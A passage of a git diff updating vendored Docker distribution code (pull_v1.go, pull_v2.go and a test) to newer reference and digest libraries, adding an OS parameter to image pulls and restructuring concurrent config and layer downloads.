-func ValidateRepoName(name string) error { - if name == "" { - return fmt.Errorf("Repository name can't be empty") - } - if name == api.NoBaseImageSpecifier { - return fmt.Errorf("'%s' is a reserved name", api.NoBaseImageSpecifier) +func ValidateRepoName(name reference.Named) error { + if reference.FamiliarName(name) == api.NoBaseImageSpecifier { + return errors.WithStack(reservedNameError(api.NoBaseImageSpecifier)) } return nil } -func addDigestReference(store reference.Store, ref reference.Named, dgst digest.Digest, id digest.Digest) error { +func addDigestReference(store refstore.Store, ref reference.Named, dgst digest.Digest, id digest.Digest) error { dgstRef, err := reference.WithDigest(reference.TrimNamed(ref), dgst) if err != nil { return err @@ -192,7 +198,7 @@ func addDigestReference(store reference.Store, ref reference.Named, dgst digest. logrus.Errorf("Image ID for digest %s changed from %s to %s, cannot update", dgst.String(), oldTagID, id) } return nil - } else if err != reference.ErrDoesNotExist { + } else if err != refstore.ErrDoesNotExist { return err } diff --git a/vendor/github.com/docker/docker/distribution/pull_v1.go b/vendor/github.com/docker/docker/distribution/pull_v1.go index f44ed4f371..c26d881223 100644 --- a/vendor/github.com/docker/docker/distribution/pull_v1.go +++ b/vendor/github.com/docker/docker/distribution/pull_v1.go @@ -1,6 +1,7 @@ -package distribution +package distribution // import "github.com/docker/docker/distribution" import ( + "context" "errors" "fmt" "io" @@ -11,7 +12,8 @@ import ( "strings" "time" - "github.com/Sirupsen/logrus" + "github.com/docker/distribution/reference" + "github.com/docker/distribution/registry/client/auth" "github.com/docker/distribution/registry/client/transport" "github.com/docker/docker/distribution/metadata" "github.com/docker/docker/distribution/xfer" @@ -22,9 +24,8 @@ import ( "github.com/docker/docker/pkg/ioutils" "github.com/docker/docker/pkg/progress" "github.com/docker/docker/pkg/stringid" 
- "github.com/docker/docker/reference" "github.com/docker/docker/registry" - "golang.org/x/net/context" + "github.com/sirupsen/logrus" ) type v1Puller struct { @@ -35,7 +36,7 @@ type v1Puller struct { session *registry.Session } -func (p *v1Puller) Pull(ctx context.Context, ref reference.Named) error { +func (p *v1Puller) Pull(ctx context.Context, ref reference.Named, os string) error { if _, isCanonical := ref.(reference.Canonical); isCanonical { // Allowing fallback, because HTTPS v1 is before HTTP v2 return fallbackError{err: ErrNoSupport{Err: errors.New("Cannot pull by digest with v1 registry")}} @@ -49,14 +50,10 @@ func (p *v1Puller) Pull(ctx context.Context, ref reference.Named) error { tr := transport.NewTransport( // TODO(tiborvass): was ReceiveTimeout registry.NewTransport(tlsConfig), - registry.DockerHeaders(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders)..., + registry.Headers(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders)..., ) client := registry.HTTPClient(tr) - v1Endpoint, err := p.endpoint.ToV1Endpoint(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders) - if err != nil { - logrus.Debugf("Could not get v1 endpoint: %v", err) - return fallbackError{err: err} - } + v1Endpoint := p.endpoint.ToV1Endpoint(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders) p.session, err = registry.NewSession(client, p.config.AuthConfig, v1Endpoint) if err != nil { // TODO(dmcgowan): Check if should fallback @@ -67,23 +64,25 @@ func (p *v1Puller) Pull(ctx context.Context, ref reference.Named) error { // TODO(dmcgowan): Check if should fallback return err } - progress.Message(p.config.ProgressOutput, "", p.repoInfo.FullName()+": this image was pulled from a legacy registry. Important: This registry version will not be supported in future versions of docker.") + progress.Message(p.config.ProgressOutput, "", p.repoInfo.Name.Name()+": this image was pulled from a legacy registry. 
Important: This registry version will not be supported in future versions of docker.") return nil } -func (p *v1Puller) pullRepository(ctx context.Context, ref reference.Named) error { - progress.Message(p.config.ProgressOutput, "", "Pulling repository "+p.repoInfo.FullName()) +// Note use auth.Scope rather than reference.Named due to this warning causing Jenkins CI to fail: +// warning: ref can be github.com/docker/docker/vendor/github.com/docker/distribution/registry/client/auth.Scope (interfacer) +func (p *v1Puller) pullRepository(ctx context.Context, ref auth.Scope) error { + progress.Message(p.config.ProgressOutput, "", "Pulling repository "+p.repoInfo.Name.Name()) tagged, isTagged := ref.(reference.NamedTagged) - repoData, err := p.session.GetRepositoryData(p.repoInfo) + repoData, err := p.session.GetRepositoryData(p.repoInfo.Name) if err != nil { if strings.Contains(err.Error(), "HTTP code: 404") { if isTagged { - return fmt.Errorf("Error: image %s:%s not found", p.repoInfo.RemoteName(), tagged.Tag()) + return fmt.Errorf("Error: image %s:%s not found", reference.Path(p.repoInfo.Name), tagged.Tag()) } - return fmt.Errorf("Error: image %s not found", p.repoInfo.RemoteName()) + return fmt.Errorf("Error: image %s not found", reference.Path(p.repoInfo.Name)) } // Unexpected HTTP error return err @@ -92,13 +91,13 @@ func (p *v1Puller) pullRepository(ctx context.Context, ref reference.Named) erro logrus.Debug("Retrieving the tag list") var tagsList map[string]string if !isTagged { - tagsList, err = p.session.GetRemoteTags(repoData.Endpoints, p.repoInfo) + tagsList, err = p.session.GetRemoteTags(repoData.Endpoints, p.repoInfo.Name) } else { var tagID string tagsList = make(map[string]string) - tagID, err = p.session.GetRemoteTag(repoData.Endpoints, p.repoInfo, tagged.Tag()) + tagID, err = p.session.GetRemoteTag(repoData.Endpoints, p.repoInfo.Name, tagged.Tag()) if err == registry.ErrRepoNotFound { - return fmt.Errorf("Tag %s not found in repository %s", 
tagged.Tag(), p.repoInfo.FullName()) + return fmt.Errorf("Tag %s not found in repository %s", tagged.Tag(), p.repoInfo.Name.Name()) } tagsList[tagged.Tag()] = tagID } @@ -127,7 +126,7 @@ func (p *v1Puller) pullRepository(ctx context.Context, ref reference.Named) erro } } - writeStatus(ref.String(), p.config.ProgressOutput, layersDownloaded) + writeStatus(reference.FamiliarString(ref), p.config.ProgressOutput, layersDownloaded) return nil } @@ -137,7 +136,7 @@ func (p *v1Puller) downloadImage(ctx context.Context, repoData *registry.Reposit return nil } - localNameRef, err := reference.WithTag(p.repoInfo, img.Tag) + localNameRef, err := reference.WithTag(p.repoInfo.Name, img.Tag) if err != nil { retErr := fmt.Errorf("Image (id: %s) has invalid tag: %s", img.ID, img.Tag) logrus.Debug(retErr.Error()) @@ -148,15 +147,15 @@ func (p *v1Puller) downloadImage(ctx context.Context, repoData *registry.Reposit return err } - progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), "Pulling image (%s) from %s", img.Tag, p.repoInfo.FullName()) + progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), "Pulling image (%s) from %s", img.Tag, p.repoInfo.Name.Name()) success := false var lastErr error for _, ep := range p.repoInfo.Index.Mirrors { ep += "v1/" - progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), fmt.Sprintf("Pulling image (%s) from %s, mirror: %s", img.Tag, p.repoInfo.FullName(), ep)) + progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), fmt.Sprintf("Pulling image (%s) from %s, mirror: %s", img.Tag, p.repoInfo.Name.Name(), ep)) if err = p.pullImage(ctx, img.ID, ep, localNameRef, layersDownloaded); err != nil { // Don't report errors when pulling from mirrors. 
- logrus.Debugf("Error pulling image (%s) from %s, mirror: %s, %s", img.Tag, p.repoInfo.FullName(), ep, err) + logrus.Debugf("Error pulling image (%s) from %s, mirror: %s, %s", img.Tag, p.repoInfo.Name.Name(), ep, err) continue } success = true @@ -164,12 +163,12 @@ func (p *v1Puller) downloadImage(ctx context.Context, repoData *registry.Reposit } if !success { for _, ep := range repoData.Endpoints { - progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), "Pulling image (%s) from %s, endpoint: %s", img.Tag, p.repoInfo.FullName(), ep) + progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), "Pulling image (%s) from %s, endpoint: %s", img.Tag, p.repoInfo.Name.Name(), ep) if err = p.pullImage(ctx, img.ID, ep, localNameRef, layersDownloaded); err != nil { // It's not ideal that only the last error is returned, it would be better to concatenate the errors. // As the error is also given to the output stream the user will see the error. lastErr = err - progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), "Error pulling image (%s) from %s, endpoint: %s, %s", img.Tag, p.repoInfo.FullName(), ep, err) + progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), "Error pulling image (%s) from %s, endpoint: %s, %s", img.Tag, p.repoInfo.Name.Name(), ep, err) continue } success = true @@ -177,7 +176,7 @@ func (p *v1Puller) downloadImage(ctx context.Context, repoData *registry.Reposit } } if !success { - err := fmt.Errorf("Error pulling image (%s) from %s, %v", img.Tag, p.repoInfo.FullName(), lastErr) + err := fmt.Errorf("Error pulling image (%s) from %s, %v", img.Tag, p.repoInfo.Name.Name(), lastErr) progress.Update(p.config.ProgressOutput, stringid.TruncateID(img.ID), err.Error()) return err } @@ -232,7 +231,7 @@ func (p *v1Puller) pullImage(ctx context.Context, v1ID, endpoint string, localNa } rootFS := image.NewRootFS() - resultRootFS, release, err := p.config.DownloadManager.Download(ctx, *rootFS, descriptors, 
p.config.ProgressOutput) + resultRootFS, release, err := p.config.DownloadManager.Download(ctx, *rootFS, "", descriptors, p.config.ProgressOutput) if err != nil { return err } diff --git a/vendor/github.com/docker/docker/distribution/pull_v2.go b/vendor/github.com/docker/docker/distribution/pull_v2.go index 88807edc7d..60a894b1c3 100644 --- a/vendor/github.com/docker/docker/distribution/pull_v2.go +++ b/vendor/github.com/docker/docker/distribution/pull_v2.go @@ -1,21 +1,21 @@ -package distribution +package distribution // import "github.com/docker/docker/distribution" import ( + "context" "encoding/json" - "errors" "fmt" "io" "io/ioutil" "net/url" "os" "runtime" + "strings" - "github.com/Sirupsen/logrus" "github.com/docker/distribution" - "github.com/docker/distribution/digest" "github.com/docker/distribution/manifest/manifestlist" "github.com/docker/distribution/manifest/schema1" "github.com/docker/distribution/manifest/schema2" + "github.com/docker/distribution/reference" "github.com/docker/distribution/registry/api/errcode" "github.com/docker/distribution/registry/client/auth" "github.com/docker/distribution/registry/client/transport" @@ -27,9 +27,13 @@ import ( "github.com/docker/docker/pkg/ioutils" "github.com/docker/docker/pkg/progress" "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/reference" + "github.com/docker/docker/pkg/system" + refstore "github.com/docker/docker/reference" "github.com/docker/docker/registry" - "golang.org/x/net/context" + "github.com/opencontainers/go-digest" + specs "github.com/opencontainers/image-spec/specs-go/v1" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) var ( @@ -59,7 +63,7 @@ type v2Puller struct { confirmedV2 bool } -func (p *v2Puller) Pull(ctx context.Context, ref reference.Named) (err error) { +func (p *v2Puller) Pull(ctx context.Context, ref reference.Named, os string) (err error) { // TODO(tiborvass): was ReceiveTimeout p.repo, p.confirmedV2, err = NewV2Repository(ctx, p.repoInfo, 
p.endpoint, p.config.MetaHeaders, p.config.AuthConfig, "pull") if err != nil { @@ -67,12 +71,11 @@ func (p *v2Puller) Pull(ctx context.Context, ref reference.Named) (err error) { return err } - if err = p.pullV2Repository(ctx, ref); err != nil { + if err = p.pullV2Repository(ctx, ref, os); err != nil { if _, ok := err.(fallbackError); ok { return err } - if continueOnError(err) { - logrus.Errorf("Error trying v2 registry: %v", err) + if continueOnError(err, p.endpoint.Mirror) { return fallbackError{ err: err, confirmedV2: p.confirmedV2, @@ -83,10 +86,10 @@ func (p *v2Puller) Pull(ctx context.Context, ref reference.Named) (err error) { return err } -func (p *v2Puller) pullV2Repository(ctx context.Context, ref reference.Named) (err error) { +func (p *v2Puller) pullV2Repository(ctx context.Context, ref reference.Named, os string) (err error) { var layersDownloaded bool if !reference.IsNameOnly(ref) { - layersDownloaded, err = p.pullV2Tag(ctx, ref) + layersDownloaded, err = p.pullV2Tag(ctx, ref, os) if err != nil { return err } @@ -108,7 +111,7 @@ func (p *v2Puller) pullV2Repository(ctx context.Context, ref reference.Named) (e if err != nil { return err } - pulledNew, err := p.pullV2Tag(ctx, tagRef) + pulledNew, err := p.pullV2Tag(ctx, tagRef, os) if err != nil { // Since this is the pull-all-tags case, don't // allow an error pulling a particular tag to @@ -124,13 +127,14 @@ func (p *v2Puller) pullV2Repository(ctx context.Context, ref reference.Named) (e } } - writeStatus(ref.String(), p.config.ProgressOutput, layersDownloaded) + writeStatus(reference.FamiliarString(ref), p.config.ProgressOutput, layersDownloaded) return nil } type v2LayerDescriptor struct { digest digest.Digest + diffID layer.DiffID repoInfo *registry.RepositoryInfo repo distribution.Repository V2MetadataService metadata.V2MetadataService @@ -148,6 +152,9 @@ func (ld *v2LayerDescriptor) ID() string { } func (ld *v2LayerDescriptor) DiffID() (layer.DiffID, error) { + if ld.diffID != "" { + return 
ld.diffID, nil + } return ld.V2MetadataService.GetDiffID(ld.digest) } @@ -228,10 +235,7 @@ func (ld *v2LayerDescriptor) Download(ctx context.Context, progressOutput progre defer reader.Close() if ld.verifier == nil { - ld.verifier, err = digest.NewDigestVerifier(ld.digest) - if err != nil { - return nil, 0, xfer.DoNotRetry{Err: err} - } + ld.verifier = ld.digest.Verifier() } _, err = io.Copy(tmpFile, io.TeeReader(reader, ld.verifier)) @@ -320,10 +324,10 @@ func (ld *v2LayerDescriptor) truncateDownloadFile() error { func (ld *v2LayerDescriptor) Registered(diffID layer.DiffID) { // Cache mapping from this layer's DiffID to the blobsum - ld.V2MetadataService.Add(diffID, metadata.V2Metadata{Digest: ld.digest, SourceRepository: ld.repoInfo.FullName()}) + ld.V2MetadataService.Add(diffID, metadata.V2Metadata{Digest: ld.digest, SourceRepository: ld.repoInfo.Name.Name()}) } -func (p *v2Puller) pullV2Tag(ctx context.Context, ref reference.Named) (tagUpdated bool, err error) { +func (p *v2Puller) pullV2Tag(ctx context.Context, ref reference.Named, os string) (tagUpdated bool, err error) { manSvc, err := p.repo.Manifests(ctx) if err != nil { return false, err @@ -333,20 +337,20 @@ func (p *v2Puller) pullV2Tag(ctx context.Context, ref reference.Named) (tagUpdat manifest distribution.Manifest tagOrDigest string // Used for logging/progress only ) - if tagged, isTagged := ref.(reference.NamedTagged); isTagged { - manifest, err = manSvc.Get(ctx, "", distribution.WithTag(tagged.Tag())) - if err != nil { - return false, allowV1Fallback(err) - } - tagOrDigest = tagged.Tag() - } else if digested, isDigested := ref.(reference.Canonical); isDigested { + if digested, isDigested := ref.(reference.Canonical); isDigested { manifest, err = manSvc.Get(ctx, digested.Digest()) if err != nil { return false, err } tagOrDigest = digested.Digest().String() + } else if tagged, isTagged := ref.(reference.NamedTagged); isTagged { + manifest, err = manSvc.Get(ctx, "", 
distribution.WithTag(tagged.Tag())) + if err != nil { + return false, allowV1Fallback(err) + } + tagOrDigest = tagged.Tag() } else { - return false, fmt.Errorf("internal error: reference has neither a tag nor a digest: %s", ref.String()) + return false, fmt.Errorf("internal error: reference has neither a tag nor a digest: %s", reference.FamiliarString(ref)) } if manifest == nil { @@ -366,7 +370,7 @@ func (p *v2Puller) pullV2Tag(ctx context.Context, ref reference.Named) (tagUpdat if configClass == "" { configClass = "unknown" } - return false, fmt.Errorf("target is %s", configClass) + return false, invalidManifestClassError{m.Manifest.Config.MediaType, configClass} } } @@ -374,8 +378,8 @@ func (p *v2Puller) pullV2Tag(ctx context.Context, ref reference.Named) (tagUpdat // the other side speaks the v2 protocol. p.confirmedV2 = true - logrus.Debugf("Pulling ref from V2 registry: %s", ref.String()) - progress.Message(p.config.ProgressOutput, tagOrDigest, "Pulling from "+p.repo.Named().Name()) + logrus.Debugf("Pulling ref from V2 registry: %s", reference.FamiliarString(ref)) + progress.Message(p.config.ProgressOutput, tagOrDigest, "Pulling from "+reference.FamiliarName(p.repo.Named())) var ( id digest.Digest @@ -387,22 +391,22 @@ func (p *v2Puller) pullV2Tag(ctx context.Context, ref reference.Named) (tagUpdat if p.config.RequireSchema2 { return false, fmt.Errorf("invalid manifest: not schema2") } - id, manifestDigest, err = p.pullSchema1(ctx, ref, v) + id, manifestDigest, err = p.pullSchema1(ctx, ref, v, os) if err != nil { return false, err } case *schema2.DeserializedManifest: - id, manifestDigest, err = p.pullSchema2(ctx, ref, v) + id, manifestDigest, err = p.pullSchema2(ctx, ref, v, os) if err != nil { return false, err } case *manifestlist.DeserializedManifestList: - id, manifestDigest, err = p.pullManifestList(ctx, ref, v) + id, manifestDigest, err = p.pullManifestList(ctx, ref, v, os) if err != nil { return false, err } default: - return false, 
errors.New("unsupported manifest format") + return false, invalidManifestFormatError{} } progress.Message(p.config.ProgressOutput, "", "Digest: "+manifestDigest.String()) @@ -413,7 +417,7 @@ func (p *v2Puller) pullV2Tag(ctx context.Context, ref reference.Named) (tagUpdat if oldTagID == id { return false, addDigestReference(p.config.ReferenceStore, ref, manifestDigest, id) } - } else if err != reference.ErrDoesNotExist { + } else if err != refstore.ErrDoesNotExist { return false, err } @@ -433,7 +437,7 @@ func (p *v2Puller) pullV2Tag(ctx context.Context, ref reference.Named) (tagUpdat return true, nil } -func (p *v2Puller) pullSchema1(ctx context.Context, ref reference.Named, unverifiedManifest *schema1.SignedManifest) (id digest.Digest, manifestDigest digest.Digest, err error) { +func (p *v2Puller) pullSchema1(ctx context.Context, ref reference.Reference, unverifiedManifest *schema1.SignedManifest, requestedOS string) (id digest.Digest, manifestDigest digest.Digest, err error) { var verifiedManifest *schema1.Manifest verifiedManifest, err = verifySchema1Manifest(unverifiedManifest, ref) if err != nil { @@ -485,7 +489,33 @@ func (p *v2Puller) pullSchema1(ctx context.Context, ref reference.Named, unverif descriptors = append(descriptors, layerDescriptor) } - resultRootFS, release, err := p.config.DownloadManager.Download(ctx, *rootFS, descriptors, p.config.ProgressOutput) + // The v1 manifest itself doesn't directly contain an OS. However, + // the history does, but unfortunately that's a string, so search through + // all the history until hopefully we find one which indicates the OS. + // supertest2014/nyan is an example of a registry image with schemav1. 
+ configOS := runtime.GOOS + if system.LCOWSupported() { + type config struct { + Os string `json:"os,omitempty"` + } + for _, v := range verifiedManifest.History { + var c config + if err := json.Unmarshal([]byte(v.V1Compatibility), &c); err == nil { + if c.Os != "" { + configOS = c.Os + break + } + } + } + } + + // Early bath if the requested OS doesn't match that of the configuration. + // This avoids doing the download, only to potentially fail later. + if !strings.EqualFold(configOS, requestedOS) { + return "", "", fmt.Errorf("cannot download image with operating system %q when requesting %q", configOS, requestedOS) + } + + resultRootFS, release, err := p.config.DownloadManager.Download(ctx, *rootFS, configOS, descriptors, p.config.ProgressOutput) if err != nil { return "", "", err } @@ -506,7 +536,7 @@ func (p *v2Puller) pullSchema1(ctx context.Context, ref reference.Named, unverif return imageID, manifestDigest, nil } -func (p *v2Puller) pullSchema2(ctx context.Context, ref reference.Named, mfst *schema2.DeserializedManifest) (id digest.Digest, manifestDigest digest.Digest, err error) { +func (p *v2Puller) pullSchema2(ctx context.Context, ref reference.Named, mfst *schema2.DeserializedManifest, requestedOS string) (id digest.Digest, manifestDigest digest.Digest, err error) { manifestDigest, err = schema2ManifestDigest(ref, mfst) if err != nil { return "", "", err @@ -536,15 +566,18 @@ func (p *v2Puller) pullSchema2(ctx context.Context, ref reference.Named, mfst *s } configChan := make(chan []byte, 1) - errChan := make(chan error, 1) + configErrChan := make(chan error, 1) + layerErrChan := make(chan error, 1) + downloadsDone := make(chan struct{}) var cancel func() ctx, cancel = context.WithCancel(ctx) + defer cancel() // Pull the image config go func() { configJSON, err := p.pullSchema2Config(ctx, target.Digest) if err != nil { - errChan <- ImageConfigPullError{Err: err} + configErrChan <- ImageConfigPullError{Err: err} cancel() return } @@ -552,9 +585,11 @@ 
func (p *v2Puller) pullSchema2(ctx context.Context, ref reference.Named, mfst *s }() var ( - configJSON []byte // raw serialized image config - downloadedRootFS *image.RootFS // rootFS from registered layers - configRootFS *image.RootFS // rootFS from configuration + configJSON []byte // raw serialized image config + downloadedRootFS *image.RootFS // rootFS from registered layers + configRootFS *image.RootFS // rootFS from configuration + release func() // release resources from rootFS download + configPlatform *specs.Platform // for LCOW when registering downloaded layers ) // https://github.com/docker/docker/issues/24766 - Err on the side of caution, @@ -566,52 +601,81 @@ func (p *v2Puller) pullSchema2(ctx context.Context, ref reference.Named, mfst *s // check to block Windows images being pulled on Linux is implemented, it // may be necessary to perform the same type of serialisation. if runtime.GOOS == "windows" { - configJSON, configRootFS, err = receiveConfig(p.config.ImageStore, configChan, errChan) + configJSON, configRootFS, configPlatform, err = receiveConfig(p.config.ImageStore, configChan, configErrChan) if err != nil { return "", "", err } - if configRootFS == nil { return "", "", errRootFSInvalid } + if err := checkImageCompatibility(configPlatform.OS, configPlatform.OSVersion); err != nil { + return "", "", err + } + + if len(descriptors) != len(configRootFS.DiffIDs) { + return "", "", errRootFSMismatch + } + + // Early bath if the requested OS doesn't match that of the configuration. + // This avoids doing the download, only to potentially fail later. 
+ if !strings.EqualFold(configPlatform.OS, requestedOS) { + return "", "", fmt.Errorf("cannot download image with operating system %q when requesting %q", configPlatform.OS, requestedOS) + } + + // Populate diff ids in descriptors to avoid downloading foreign layers + // which have been side loaded + for i := range descriptors { + descriptors[i].(*v2LayerDescriptor).diffID = configRootFS.DiffIDs[i] + } } if p.config.DownloadManager != nil { - downloadRootFS := *image.NewRootFS() - rootFS, release, err := p.config.DownloadManager.Download(ctx, downloadRootFS, descriptors, p.config.ProgressOutput) - if err != nil { - if configJSON != nil { - // Already received the config - return "", "", err - } - select { - case err = <-errChan: - return "", "", err - default: - cancel() - select { - case <-configChan: - case <-errChan: - } - return "", "", err + go func() { + var ( + err error + rootFS image.RootFS + ) + downloadRootFS := *image.NewRootFS() + rootFS, release, err = p.config.DownloadManager.Download(ctx, downloadRootFS, requestedOS, descriptors, p.config.ProgressOutput) + if err != nil { + // Intentionally do not cancel the config download here + // as the error from config download (if there is one) + // is more interesting than the layer download error + layerErrChan <- err + return } - } - if release != nil { - defer release() - } - downloadedRootFS = &rootFS + downloadedRootFS = &rootFS + close(downloadsDone) + }() + } else { + // We have nothing to download + close(downloadsDone) } if configJSON == nil { - configJSON, configRootFS, err = receiveConfig(p.config.ImageStore, configChan, errChan) + configJSON, configRootFS, _, err = receiveConfig(p.config.ImageStore, configChan, configErrChan) + if err == nil && configRootFS == nil { + err = errRootFSInvalid + } if err != nil { + cancel() + select { + case <-downloadsDone: + case <-layerErrChan: + } return "", "", err } + } - if configRootFS == nil { - return "", "", errRootFSInvalid - } + select { + case 
<-downloadsDone: + case err = <-layerErrChan: + return "", "", err + } + + if release != nil { + defer release() } if downloadedRootFS != nil { @@ -637,42 +701,50 @@ func (p *v2Puller) pullSchema2(ctx context.Context, ref reference.Named, mfst *s return imageID, manifestDigest, nil } -func receiveConfig(s ImageConfigStore, configChan <-chan []byte, errChan <-chan error) ([]byte, *image.RootFS, error) { +func receiveConfig(s ImageConfigStore, configChan <-chan []byte, errChan <-chan error) ([]byte, *image.RootFS, *specs.Platform, error) { select { case configJSON := <-configChan: rootfs, err := s.RootFSFromConfig(configJSON) if err != nil { - return nil, nil, err + return nil, nil, nil, err } - return configJSON, rootfs, nil + platform, err := s.PlatformFromConfig(configJSON) + if err != nil { + return nil, nil, nil, err + } + return configJSON, rootfs, platform, nil case err := <-errChan: - return nil, nil, err + return nil, nil, nil, err // Don't need a case for ctx.Done in the select because cancellation // will trigger an error in p.pullSchema2ImageConfig. } } // pullManifestList handles "manifest lists" which point to various -// platform-specifc manifests. -func (p *v2Puller) pullManifestList(ctx context.Context, ref reference.Named, mfstList *manifestlist.DeserializedManifestList) (id digest.Digest, manifestListDigest digest.Digest, err error) { +// platform-specific manifests. +func (p *v2Puller) pullManifestList(ctx context.Context, ref reference.Named, mfstList *manifestlist.DeserializedManifestList, os string) (id digest.Digest, manifestListDigest digest.Digest, err error) { manifestListDigest, err = schema2ManifestDigest(ref, mfstList) if err != nil { return "", "", err } - var manifestDigest digest.Digest - for _, manifestDescriptor := range mfstList.Manifests { - // TODO(aaronl): The manifest list spec supports optional - // "features" and "variant" fields. These are not yet used. - // Once they are, their values should be interpreted here. 
- if manifestDescriptor.Platform.Architecture == runtime.GOARCH && manifestDescriptor.Platform.OS == runtime.GOOS { - manifestDigest = manifestDescriptor.Digest - break - } + logrus.Debugf("%s resolved to a manifestList object with %d entries; looking for a %s/%s match", ref, len(mfstList.Manifests), os, runtime.GOARCH) + + manifestMatches := filterManifests(mfstList.Manifests, os) + + if len(manifestMatches) == 0 { + errMsg := fmt.Sprintf("no matching manifest for %s/%s in the manifest list entries", os, runtime.GOARCH) + logrus.Debugf(errMsg) + return "", "", errors.New(errMsg) } - if manifestDigest == "" { - return "", "", errors.New("no supported platform found in manifest list") + if len(manifestMatches) > 1 { + logrus.Debugf("found multiple matches in manifest list, choosing best match %s", manifestMatches[0].Digest.String()) + } + manifestDigest := manifestMatches[0].Digest + + if err := checkImageCompatibility(manifestMatches[0].Platform.OS, manifestMatches[0].Platform.OSVersion); err != nil { + return "", "", err } manSvc, err := p.repo.Manifests(ctx) @@ -692,12 +764,12 @@ func (p *v2Puller) pullManifestList(ctx context.Context, ref reference.Named, mf switch v := manifest.(type) { case *schema1.SignedManifest: - id, _, err = p.pullSchema1(ctx, manifestRef, v) + id, _, err = p.pullSchema1(ctx, manifestRef, v, os) if err != nil { return "", "", err } case *schema2.DeserializedManifest: - id, _, err = p.pullSchema2(ctx, manifestRef, v) + id, _, err = p.pullSchema2(ctx, manifestRef, v, os) if err != nil { return "", "", err } @@ -716,10 +788,7 @@ func (p *v2Puller) pullSchema2Config(ctx context.Context, dgst digest.Digest) (c } // Verify image config digest - verifier, err := digest.NewDigestVerifier(dgst) - if err != nil { - return nil, err - } + verifier := dgst.Verifier() if _, err := verifier.Write(configJSON); err != nil { return nil, err } @@ -742,10 +811,7 @@ func schema2ManifestDigest(ref reference.Named, mfst distribution.Manifest) (dig // If pull by 
digest, then verify the manifest digest. if digested, isDigested := ref.(reference.Canonical); isDigested { - verifier, err := digest.NewDigestVerifier(digested.Digest()) - if err != nil { - return "", err - } + verifier := digested.Digest().Verifier() if _, err := verifier.Write(canonical); err != nil { return "", err } @@ -793,15 +859,12 @@ func allowV1Fallback(err error) error { return err } -func verifySchema1Manifest(signedManifest *schema1.SignedManifest, ref reference.Named) (m *schema1.Manifest, err error) { +func verifySchema1Manifest(signedManifest *schema1.SignedManifest, ref reference.Reference) (m *schema1.Manifest, err error) { // If pull by digest, then verify the manifest digest. NOTE: It is // important to do this first, before any other content validation. If the // digest cannot be verified, don't even bother with those other things. if digested, isCanonical := ref.(reference.Canonical); isCanonical { - verifier, err := digest.NewDigestVerifier(digested.Digest()) - if err != nil { - return nil, err - } + verifier := digested.Digest().Verifier() if _, err := verifier.Write(signedManifest.Canonical); err != nil { return nil, err } @@ -814,13 +877,13 @@ func verifySchema1Manifest(signedManifest *schema1.SignedManifest, ref reference m = &signedManifest.Manifest if m.SchemaVersion != 1 { - return nil, fmt.Errorf("unsupported schema version %d for %q", m.SchemaVersion, ref.String()) + return nil, fmt.Errorf("unsupported schema version %d for %q", m.SchemaVersion, reference.FamiliarString(ref)) } if len(m.FSLayers) != len(m.History) { - return nil, fmt.Errorf("length of history not equal to number of layers for %q", ref.String()) + return nil, fmt.Errorf("length of history not equal to number of layers for %q", reference.FamiliarString(ref)) } if len(m.FSLayers) == 0 { - return nil, fmt.Errorf("no FSLayers in manifest for %q", ref.String()) + return nil, fmt.Errorf("no FSLayers in manifest for %q", reference.FamiliarString(ref)) } return m, nil } @@ 
-866,7 +929,7 @@ func fixManifestLayers(m *schema1.Manifest) error { m.FSLayers = append(m.FSLayers[:i], m.FSLayers[i+1:]...) m.History = append(m.History[:i], m.History[i+1:]...) } else if imgs[i].Parent != imgs[i+1].ID { - return fmt.Errorf("Invalid parent ID. Expected %v, got %v.", imgs[i+1].ID, imgs[i].Parent) + return fmt.Errorf("invalid parent ID. Expected %v, got %v", imgs[i+1].ID, imgs[i].Parent) } } diff --git a/vendor/github.com/docker/docker/distribution/pull_v2_test.go b/vendor/github.com/docker/docker/distribution/pull_v2_test.go index b745642e3b..ca3470c8cf 100644 --- a/vendor/github.com/docker/docker/distribution/pull_v2_test.go +++ b/vendor/github.com/docker/docker/distribution/pull_v2_test.go @@ -1,4 +1,4 @@ -package distribution +package distribution // import "github.com/docker/docker/distribution" import ( "encoding/json" @@ -8,9 +8,11 @@ import ( "strings" "testing" - "github.com/docker/distribution/digest" "github.com/docker/distribution/manifest/schema1" - "github.com/docker/docker/reference" + "github.com/docker/distribution/reference" + "github.com/opencontainers/go-digest" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) // TestFixManifestLayers checks that fixManifestLayers removes a duplicate @@ -102,9 +104,8 @@ func TestFixManifestLayersBadParent(t *testing.T) { }, } - if err := fixManifestLayers(&duplicateLayerManifest); err == nil || !strings.Contains(err.Error(), "Invalid parent ID.") { - t.Fatalf("expected an invalid parent ID error from fixManifestLayers") - } + err := fixManifestLayers(&duplicateLayerManifest) + assert.Check(t, is.ErrorContains(err, "invalid parent ID")) } // TestValidateManifest verifies the validateManifest function @@ -113,7 +114,7 @@ func TestValidateManifest(t *testing.T) { if runtime.GOOS == "windows" { t.Skip("Needs fixing on Windows") } - expectedDigest, err := reference.ParseNamed("repo@sha256:02fee8c3220ba806531f606525eceb83f4feb654f62b207191b1c9209188dedd") + expectedDigest, err := 
